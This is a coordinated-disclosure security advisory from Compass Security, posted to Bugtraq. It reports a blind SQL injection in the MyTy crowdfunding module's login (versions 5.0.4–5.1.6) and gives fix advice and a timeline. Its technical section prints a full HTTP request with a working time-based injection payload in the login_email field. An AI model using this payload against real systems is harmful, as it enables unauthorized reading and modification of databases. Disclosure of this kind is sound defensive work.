lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 21 Nov 2017 17:12:48 +0000
From: Advisories <advisories@...pass-security.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
  "bugs@...uritytracker.com" <bugs@...uritytracker.com>
Subject: CSNC-2017-029 MyTy Blind SQL Injection

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-029
# CVE ID:   -
# Subject:  Blind SQL injection
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heiniger@...pass-security.com>
# Date:     21.11.2017
#
#############################################################

Introduction:
-------------
MyTy[1] is a software framework that includes a crowdfunding module. It can be 
installed on a customer server and used to create whitelabel websites for 
crowdfunding platforms.

Compass Security discovered a web application security flaw in the crowdfunding 
module login process that allows an unauthenticated attacker to execute 
arbitrary SQL query against the database. This allows to read and modify the 
whole database, within the privilege limitations of the database user executing 
the queries.


Affected:
---------
Vulnerable:
 * MyTy 5.0.4 to 5.1.6
 
 
Technical Description
---------------------
During the login process, the user email and password are sent in a POST 
request. In this request, the login_email parameter is concatenated into an SQL 
query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following 
request:
===============
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1
&type=simpleLogin&activeTab=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;
 lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; 
 _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; 
 cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1&callback=&redirect=&fwd=%252Fprojekte%252Fsuchergebnisse.html%253F
&login_type=inline&popin=1&type=simpleLogin
&login_email=test'%2b(select*from(select(sleep(20)))a)%2b'&login_password=1234
===============


Workaround / Fix:
-----------------
Install an up to date version of the MyTy software.

As a developer:
Strictly use prepared statements in order to protect the application from SQL 
injection.

Optional addition:
Validate all user input and filter dangerous characters, which can cause a 
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;


Timeline:
---------
2017-11-21:     Coordinated public disclosure date
2017-09-06:     Release of fix in versions 5.0.12 and 5.1.7
2017-09-06:     Initial vendor response
2017-09-06:     Initial vendor notification
2017-09-06:     Discovery by Nicolas Heiniger


References:
-----------
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ